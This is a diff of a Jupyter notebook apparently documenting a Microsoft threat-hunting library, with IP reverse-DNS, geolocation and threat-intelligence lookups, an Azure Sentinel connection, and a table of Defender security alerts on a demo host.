+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "           qname rdtype  \\\n",
+       "0  20.72.193.242    PTR   \n",
+       "\n",
+       "                                                                           response  \\\n",
+       "0  None of DNS query names exist: 20.72.193.242., 20.72.193.242.corp.microsoft.com.   \n",
+       "\n",
+       "      ip_address  \n",
+       "0  20.72.193.242  "
+      ]
+     },
+     "execution_count": 18,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.ip_rev_resolve(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-122.3412</td>\n",
+       "      <td>47.6032</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  CountryCode    CountryName       State  City  Longitude  Latitude   Asn  \\\n",
+       "0          US  United States  Washington  None  -122.3412   47.6032  None   \n",
+       "\n",
+       "  edges         Type AdditionalData      IpAddress  \n",
+       "0    {}  geolocation             {}  20.72.193.242  "
+      ]
+     },
+     "execution_count": 19,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.geoloc(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>SafeIoc</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>None</td>\n",
+       "      <td>Tor</td>\n",
+       "      <td>True</td>\n",
+       "      <td>information</td>\n",
+       "      <td>Not found.</td>\n",
+       "      <td>None</td>\n",
+       "      <td>https://check.torproject.org/exit-addresses</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>None</td>\n",
+       "      <td>VirusTotal</td>\n",
+       "      <td>True</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>{'verbose_msg': 'Missing IP address', 'response_code': 0}</td>\n",
+       "      <td>{'response_code': 0, 'verbose_msg': 'Missing IP address'}</td>\n",
+       "      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>None</td>\n",
+       "      <td>XForce</td>\n",
+       "      <td>True</td>\n",
+       "      <td>warning</td>\n",
+       "      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n",
+       "      <td>{'ip': '20.72.193.242', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional ...</td>\n",
+       "      <td>https://api.xforce.ibmcloud.com/ipr/20.72.193.242</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "             Ioc IocType        SafeIoc QuerySubtype    Provider  Result  \\\n",
+       "0  20.72.193.242    ipv4  20.72.193.242         None         Tor    True   \n",
+       "0  20.72.193.242    ipv4  20.72.193.242         None  VirusTotal    True   \n",
+       "0  20.72.193.242    ipv4  20.72.193.242         None      XForce    True   \n",
+       "\n",
+       "      Severity  \\\n",
+       "0  information   \n",
+       "0      unknown   \n",
+       "0      warning   \n",
+       "\n",
+       "                                                                                               Details  \\\n",
+       "0                                                                                           Not found.   \n",
+       "0                                            {'verbose_msg': 'Missing IP address', 'response_code': 0}   \n",
+       "0  {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \n",
+       "\n",
+       "                                                                                             RawResult  \\\n",
+       "0                                                                                                 None   \n",
+       "0                                            {'response_code': 0, 'verbose_msg': 'Missing IP address'}   \n",
+       "0  {'ip': '20.72.193.242', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional ...   \n",
+       "\n",
+       "                                               Reference  Status  \n",
+       "0            https://check.torproject.org/exit-addresses       0  \n",
+       "0  https://www.virustotal.com/vtapi/v2/ip-address/report       0  \n",
+       "0      https://api.xforce.ibmcloud.com/ipr/20.72.193.242       0  "
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.ti.lookup_ip(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Notice that we didn't need to worry about either the parameter\n",
+    "name or format (more on this in the next section). Also, \n",
+    "whatever the function, the output is always returned\n",
+    "as a pandas DataFrame."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### For Data query functions you *do* need to worry about the parameter name\n",
+    "Data query functions are a little more complex than most other functions\n",
+    "and specifically often support many parameters. Rather than try\n",
+    "to guess which parameter you meant, we require you to be explicit.\n",
+    "\n",
+    "To use a data query, we need to authenticate to the provider."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                            <html><body>\n",
+       "\n",
+       "                            <!-- h1 id=\"user_code_p\"><b>RW8L2FJCE</b><br></h1-->\n",
+       "\n",
+       "                            <input  id=\"kql_MagicCodeAuthInput\" type=\"text\" readonly style=\"font-weight: bold; border: none;\" size='9' value='RW8L2FJCE'>\n",
+       "\n",
+       "                            <button id='kql_MagicCodeAuth_button', onclick=\"this.style.visibility='hidden';kql_MagicCodeAuthFunction()\">Copy code to clipboard and authenticate</button>\n",
+       "\n",
+       "                            <script>\n",
+       "                            var kql_MagicUserCodeAuthWindow = null;\n",
+       "                            function kql_MagicCodeAuthFunction() {\n",
+       "                                /* Get the text field */\n",
+       "                                var copyText = document.getElementById(\"kql_MagicCodeAuthInput\");\n",
+       "\n",
+       "                                /* Select the text field */\n",
+       "                                copyText.select();\n",
+       "\n",
+       "                                /* Copy the text inside the text field */\n",
+       "                                document.execCommand(\"copy\");\n",
+       "\n",
+       "                                /* Alert the copied text */\n",
+       "                                // alert(\"Copied the text: \" + copyText.value);\n",
+       "\n",
+       "                                var w = screen.width / 2;\n",
+       "                                var h = screen.height / 2;\n",
+       "                                params = 'width='+w+',height='+h\n",
+       "                                kql_MagicUserCodeAuthWindow = window.open('https://microsoft.com/devicelogin', 'kql_MagicUserCodeAuthWindow', params);\n",
+       "\n",
+       "                                // TODO: save selected cell index, so that the clear will be done on the lince cell\n",
+       "                            }\n",
+       "                            </script>\n",
+       "\n",
+       "                            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                            <html><body><script>\n",
+       "\n",
+       "                                // close authentication window\n",
+       "                                if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n",
+       "                                    kql_MagicUserCodeAuthWindow.close()\n",
+       "                                }\n",
+       "                                // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n",
+       "\n",
+       "                                // clear output cell\n",
+       "                                Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n",
+       "\n",
+       "                                // TODO: if in run all mode, move to last cell, otherwise move to next cell\n",
+       "                                // move to next cell\n",
+       "\n",
+       "                            </script></body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "            <html><body>\n",
+       "            <div style=''>\n",
+       "            \n",
+       "            <button onclick=\"this.style.visibility='visible';\n",
+       "            kql_MagicLaunchWindowFunction('kqlmagic/temp_files/1a4a75be-860e-432e-a3ac-d1245c05c3a6/_8ecf8077-cf51-4820-aadd-14040956f35d_at_loganalytics_schema.html', 'fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,', '_8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema', '');\n",
+       "            kql_MagicCloseWindow(kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema, -1, -1);\">\n",
+       "            popup schema 8ecf8077-cf51-4820-aadd-14040956f35d@loganalytics</button>\n",
+       "            </div>\n",
+       "\n",
+       "            <script>\n",
+       "            var kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema = null;\n",
+       "\n",
+       "\n",
+       "            function kql_MagicCloseWindow(window_obj, obj_secs, itself_secs) {\n",
+       "                if (obj_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){\n",
+       "                        window_obj.close();\n",
+       "                        if (itself_secs >= 0) {\n",
+       "                            __timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                        }\n",
+       "                    }, obj_secs * 1000);\n",
+       "                } else if (itself_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                }\n",
+       "            }\n",
+       "\n",
+       "            function kql_MagicLaunchWindowFunction(file_path_or_data, window_params, window_name, host_or_text) {\n",
+       "                var url;\n",
+       "                const baseURI = String(window.location);\n",
+       "                if (host_or_text == 'text' || host_or_text == 'body') {\n",
+       "                    url = ''\n",
+       "                } else if (file_path_or_data.startsWith('http')) {\n",
+       "                    url = file_path_or_data;\n",
+       "                } else if (host_or_text.endsWith('.azureml.ms') || host_or_text.endsWith('.azureml.net')) {\n",
+       "                    let azuremlBaseURI = String(window.document.baseURI);\n",
+       "                    let start = azuremlBaseURI.search('activeFilePath=');\n",
+       "                    if (start > 0) {\n",
+       "                        start += 'activeFilePath='.length;\n",
+       "                        let end = azuremlBaseURI.substring(start).search('&');\n",
+       "                        if (end < 0) {\n",
+       "                            end = undefined;\n",
+       "                        }\n",
+       "                        let parts = azuremlBaseURI.substring(start, end).split('/');\n",
+       "                        parts.pop();\n",
+       "                        url = host_or_text + '/tree/' + parts.join('/') + '/' + file_path_or_data;\n",
+       "                    } else {\n",
+       "                        var parts = baseURI.split('/');\n",
+       "                        parts.pop();\n",
+       "                        url = parts.join('/') + '/' + file_path_or_data;\n",
+       "                    }\n",
+       "                } else {\n",
+       "                    var base_url = '';\n",
+       "\n",
+       "                    // check if azure notebook\n",
+       "                    var azure_host = (host_or_text == null || host_or_text.length == 0) ? 'https://notebooks.azure.com' : host_or_text;\n",
+       "                    var start = azure_host.search('//');\n",
+       "                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n",
+       "\n",
+       "                    var end = baseURI.search(azure_host_suffix);\n",
+       "                    start = baseURI.search('//');\n",
+       "                    if (start > 0 && end > 0) {\n",
+       "                        // # azure notebook environment, assume template: https://library-user.notebooks.azure.com\n",
+       "                        var parts = baseURI.substring(start+2, end).split('-');\n",
+       "                        if (parts.length == 2) {\n",
+       "                            var library = parts[0];\n",
+       "                            var user = parts[1];\n",
+       "                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // check if local jupyter lab\n",
+       "                    if (base_url.length == 0) {\n",
+       "                        var configDataScipt  = document.getElementById('jupyter-config-data');\n",
+       "                        if (configDataScipt != null) {\n",
+       "                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n",
+       "                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n",
+       "                                var basePath = 'e:/src/microsoft/msticpy/docs/notebooks' + '/';\n",
+       "                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n",
+       "                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n",
+       "                                }\n",
+       "                            }\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // works for local jupyter notebook\n",
+       "                    if (base_url.length == 0) {\n",
+       "\n",
+       "                        var parts = baseURI.split('/');\n",
+       "                        parts.pop(); // remove notebook name segment\n",
+       "                        base_url = parts.join('/') + '/';\n",
+       "                    }\n",
+       "                    url = base_url + file_path_or_data;\n",
+       "                }\n",
+       "\n",
+       "                window.focus();\n",
+       "                var w = screen.width / 2;\n",
+       "                var h = screen.height / 2;\n",
+       "                params = 'width='+w+',height='+h;\n",
+       "                // kql_Magic + window_name should be a global variable \n",
+       "                window_obj = window.open(url, window_name, window_params + params);\n",
+       "                if (url == '') {\n",
+       "                    let decodedData = atob(file_path_or_data);\n",
+       "                    if (host_or_text == 'text') {\n",
+       "                        var el = window_obj.document.createElement('p');\n",
+       "                        window_obj.document.body.overflow = 'auto';\n",
+       "                        el.style.top = 0;\n",
+       "                        el.style.left = 0;\n",
+       "                        el.innerHTML = decodedData;\n",
+       "                        window_obj.document.body.appendChild(el);\n",
+       "                    } else {\n",
+       "                        window_obj.document.body.innerHTML = decodedData;\n",
+       "                    }\n",
+       "                }\n",
+       "                kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema = window_obj;\n",
+       "            }\n",
+       "            </script>\n",
+       "\n",
+       "            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "az_provider.connect(WorkspaceConfig(workspace=\"CyberSecuritySoc\").code_connect_str)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If you are not sure of the parameters required by the query\n",
+    "you can use the built-in help"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "\u001b[1;31mSignature:\u001b[0m \u001b[0mHost\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAzureSentinel\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mSecurityAlert_list_related_alerts\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mUnion\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mAny\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+       "\u001b[1;31mDocstring:\u001b[0m\n",
+       "Retrieves list of alerts with a common host, account or process\n",
+       "\n",
+       "Parameters\n",
+       "----------\n",
+       "account_name: str (optional)\n",
+       "    The account name to find\n",
+       "add_query_items: str (optional)\n",
+       "    Additional query clauses\n",
+       "end: datetime (optional)\n",
+       "    Query end time\n",
+       "host_name: str (optional)\n",
+       "    The hostname to find\n",
+       "path_separator: str (optional)\n",
+       "    Path separator\n",
+       "    (default value is: \\\\)\n",
+       "process_name: str (optional)\n",
+       "    The process name to find\n",
+       "query_project: str (optional)\n",
+       "    Column project statement\n",
+       "    (default value is:  | project-rename StartTimeUtc = StartTime, EndTim...)\n",
+       "start: datetime (optional)\n",
+       "    Query start time\n",
+       "    (default value is: -30)\n",
+       "subscription_filter: str (optional)\n",
+       "    Optional subscription/tenant filter expression\n",
+       "    (default value is: true)\n",
+       "table: str (optional)\n",
+       "    Table name\n",
+       "    (default value is: SecurityAlert)\n",
+       "\u001b[1;31mFile:\u001b[0m      c:\\users\\ian\\anaconda3\\envs\\condadev\\lib\\functools.py\n",
+       "\u001b[1;31mType:\u001b[0m      function\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Host.AzureSentinel.SecurityAlert_list_related_alerts?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>src_hostname</th>\n",
+       "      <th>src_accountname</th>\n",
+       "      <th>src_procname</th>\n",
+       "      <th>host_match</th>\n",
+       "      <th>acct_match</th>\n",
+       "      <th>proc_match</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-03-11 12:05:14.355000+00:00</td>\n",
+       "      <td>Suspected credential theft activity</td>\n",
+       "      <td>Suspected credential theft activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>This program exhibits suspect characteristics potentially associated with credential theft.  Onc...</td>\n",
+       "      <td>MDATP</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>da637509097413415122_-841817867</td>\n",
+       "      <td>bf226b1b-8bda-31f7-c848-1f8bbb5f5922</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>WindowsDefenderAtp</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-03-09 17:56:55.275000+00:00</td>\n",
+       "      <td>2021-03-09 17:56:55.275000+00:00</td>\n",
+       "      <td>2021-03-11 12:05:13.759000+00:00</td>\n",
+       "      <td>[\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...</td>\n",
+       "      <td>{\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>Microsoft Defender Advanced Threat Protection</td>\n",
+       "      <td></td>\n",
+       "      <td>https://securitycenter.microsoft.com/alert/da637509097413415122_-841817867?tid=4b2462a4-bbee-495...</td>\n",
+       "      <td>New</td>\n",
+       "      <td>victim00.na.contosohotels.com</td>\n",
+       "      <td>CredentialAccess</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-03-11 13:24:53.495000+00:00</td>\n",
+       "      <td>'Mimikatz' hacktool was detected</td>\n",
+       "      <td>'Mimikatz' hacktool was detected</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Readily available tools, such as hacking programs, can be used by unauthorized individuals to sp...</td>\n",
+       "      <td>MDATP</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>da637510393722104539_-1180405651</td>\n",
+       "      <td>ef04126b-2683-0a98-d01c-77ee6b1115ac</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>WindowsDefenderAv</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-03-11 06:00:14.083000+00:00</td>\n",
+       "      <td>2021-03-11 06:00:14.083000+00:00</td>\n",
+       "      <td>2021-03-11 13:24:53.379000+00:00</td>\n",
+       "      <td>[\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...</td>\n",
+       "      <td>{\\r\\n  \"MicrosoftDefenderAtp.Category\": \"Malware\",\\r\\n  \"MicrosoftDefenderAtp.InvestigationId\": ...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>Microsoft Defender Advanced Threat Protection</td>\n",
+       "      <td></td>\n",
+       "      <td>https://securitycenter.microsoft.com/alert/da637510393722104539_-1180405651?tid=4b2462a4-bbee-49...</td>\n",
+       "      <td>New</td>\n",
+       "      <td>victim00.na.contosohotels.com</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-03-11 13:24:53.490000+00:00</td>\n",
+       "      <td>Suspected credential theft activity</td>\n",
+       "      <td>Suspected credential theft activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>This program exhibits suspect characteristics potentially associated with credential theft.  Onc...</td>\n",
+       "      <td>MDATP</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>da637509097413415122_-841817867</td>\n",
+       "      <td>bf226b1b-8bda-31f7-c848-1f8bbb5f5922</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>WindowsDefenderAtp</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-03-09 17:56:55.275000+00:00</td>\n",
+       "      <td>2021-03-09 17:56:55.275000+00:00</td>\n",
+       "      <td>2021-03-11 13:24:53.363000+00:00</td>\n",
+       "      <td>[\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...</td>\n",
+       "      <td>{\\r\\n  \"MicrosoftDefenderAtp.Category\": \"CredentialAccess\",\\r\\n  \"MicrosoftDefenderAtp.Investiga...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"DnsDomain\": \"na.contosohotels.com\",\\r\\n    \"HostName\": \"vict...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>Microsoft Defender Advanced Threat Protection</td>\n",
+       "      <td></td>\n",
+       "      <td>https://securitycenter.microsoft.com/alert/da637509097413415122_-841817867?tid=4b2462a4-bbee-495...</td>\n",
+       "      <td>New</td>\n",
+       "      <td>victim00.na.contosohotels.com</td>\n",
+       "      <td>CredentialAccess</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td>victim00</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2021-03-11 13:19:42.521000+00:00</td>\n",
+       "      <td>Malicious credential theft tool execution detected</td>\n",
+       "      <td>Malicious credential theft tool execution detected</td>\n",
+       "      <td>High</td>\n",
+       "      <td>A known credential theft tool execution command line was detected.\\nEither the process itself or...</td>\n",
+       "      <td>MDATP</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>da637508847019595161_-562481393</td>\n",
+       "      <td>753680a5-4d20-2726-61b4-9c36e620ea26</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>WindowsDefenderAtp</td>\n",
+       "      <td></td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2021-03-09 10:56:58.134000+00:00</td>\n",
+       "      <td>2021-03-09 10:56:58.134000+00:00</td>\n",
+       "      <td>2021-03-11 13:19:42.289000+00:00</td>\n",
+       "      <td>[\\r\\n  \"1. Make sure the machine is completely updated and all your software has the latest patc...</td>\n",
